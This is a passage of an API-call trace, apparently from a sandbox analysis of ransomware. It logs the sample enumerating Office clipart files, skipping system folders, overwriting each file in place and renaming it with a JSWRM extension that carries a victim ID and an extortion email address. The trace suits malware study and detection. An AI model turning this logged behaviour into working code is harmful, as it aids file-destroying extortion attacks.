hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0080.743] CloseHandle (hObject=0x314) returned 1 [0080.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0080.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0080.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0080.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0080.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0080.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0080.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.744] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105282.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105282.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105282.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0080.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0080.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0080.744] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19a8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105286.WMF", cAlternateFileName="")) returned 1 [0080.744] lstrcmpiW (lpString1="J0105286.WMF", lpString2=".") returned 1 [0080.744] lstrcmpiW (lpString1="J0105286.WMF", lpString2="..") returned 1 [0080.744] lstrcmpiW (lpString1="J0105286.WMF", lpString2="...") returned 1 [0080.745] lstrcmpiW (lpString1="J0105286.WMF", lpString2="windows") returned -1 [0080.745] lstrcmpiW (lpString1="J0105286.WMF", lpString2="recovery") returned -1 [0080.745] lstrcmpiW (lpString1="J0105286.WMF", lpString2="perflogs") returned -1 [0080.745] lstrcmpiW (lpString1="J0105286.WMF", lpString2="documents and settings") returned 1 [0080.745] lstrcmpiW (lpString1="J0105286.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.745] lstrcmpiW (lpString1="J0105286.WMF", lpString2="system volume information") returned -1 [0080.745] lstrcmpiW (lpString1="J0105286.WMF", lpString2="msocache") returned -1 [0080.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0080.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105286.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105286.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105286.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0080.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0080.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105286.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105286.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105286.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0080.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0080.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0080.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0080.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105286.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105286.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.745] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6568) returned 1 [0080.745] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19a0) returned 0x205850 [0080.745] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x19a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x19a0, lpOverlapped=0x0) returned 1 [0080.747] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.747] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x19a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x19a0, lpOverlapped=0x0) returned 1 [0080.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0080.748] CloseHandle (hObject=0x314) returned 1 [0080.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0080.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0080.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0080.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0080.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0080.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0080.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0080.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0080.748] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105286.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105286.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105286.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105286.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0080.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0080.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0080.749] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3dd8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105288.WMF", cAlternateFileName="")) returned 1 [0080.749] lstrcmpiW (lpString1="J0105288.WMF", lpString2=".") returned 1 [0080.749] lstrcmpiW (lpString1="J0105288.WMF", lpString2="..") returned 1 [0080.749] lstrcmpiW (lpString1="J0105288.WMF", lpString2="...") returned 1 [0080.749] lstrcmpiW (lpString1="J0105288.WMF", lpString2="windows") returned -1 [0080.749] lstrcmpiW (lpString1="J0105288.WMF", lpString2="recovery") returned -1 [0080.749] lstrcmpiW (lpString1="J0105288.WMF", lpString2="perflogs") returned -1 [0080.749] lstrcmpiW (lpString1="J0105288.WMF", lpString2="documents and settings") returned 1 [0080.749] lstrcmpiW (lpString1="J0105288.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.749] lstrcmpiW (lpString1="J0105288.WMF", lpString2="system volume information") returned -1 [0080.749] lstrcmpiW (lpString1="J0105288.WMF", lpString2="msocache") returned -1 [0080.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0080.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105288.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105288.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105288.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0080.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0080.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105288.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105288.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105288.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0080.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0080.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0080.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0080.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105288.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.750] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15832) returned 1 [0080.750] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3dd0) returned 0x24d210 [0080.750] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3dd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3dd0, lpOverlapped=0x0) returned 1 [0080.752] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.752] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3dd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3dd0, lpOverlapped=0x0) returned 1 [0080.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.752] CloseHandle (hObject=0x314) returned 1 [0080.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0080.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0080.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0080.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0080.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0080.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0080.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.753] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105288.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105288.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105288.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0080.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0080.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0080.754] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3a14, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105292.WMF", cAlternateFileName="")) returned 1 [0080.754] lstrcmpiW (lpString1="J0105292.WMF", lpString2=".") returned 1 [0080.754] lstrcmpiW (lpString1="J0105292.WMF", lpString2="..") returned 1 [0080.754] lstrcmpiW (lpString1="J0105292.WMF", lpString2="...") returned 1 [0080.754] lstrcmpiW (lpString1="J0105292.WMF", lpString2="windows") returned -1 [0080.754] lstrcmpiW (lpString1="J0105292.WMF", lpString2="recovery") returned -1 [0080.754] lstrcmpiW (lpString1="J0105292.WMF", lpString2="perflogs") returned -1 [0080.754] lstrcmpiW (lpString1="J0105292.WMF", lpString2="documents and settings") returned 1 [0080.754] lstrcmpiW (lpString1="J0105292.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.754] lstrcmpiW (lpString1="J0105292.WMF", lpString2="system volume information") returned -1 [0080.754] lstrcmpiW (lpString1="J0105292.WMF", lpString2="msocache") returned -1 [0080.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0080.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105292.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105292.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105292.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0080.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0080.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105292.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105292.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105292.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0080.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0080.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0080.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0080.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105292.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.755] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14868) returned 1 [0080.755] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3a10) returned 0x24d210 [0080.755] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3a10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3a10, lpOverlapped=0x0) returned 1 [0080.875] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.875] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3a10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3a10, lpOverlapped=0x0) returned 1 [0080.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.876] CloseHandle (hObject=0x314) returned 1 [0080.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0080.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0080.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0080.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0080.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0080.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0080.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.876] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105292.wmf"), lpNewFileName="C:\\Program Files\\Microsoft 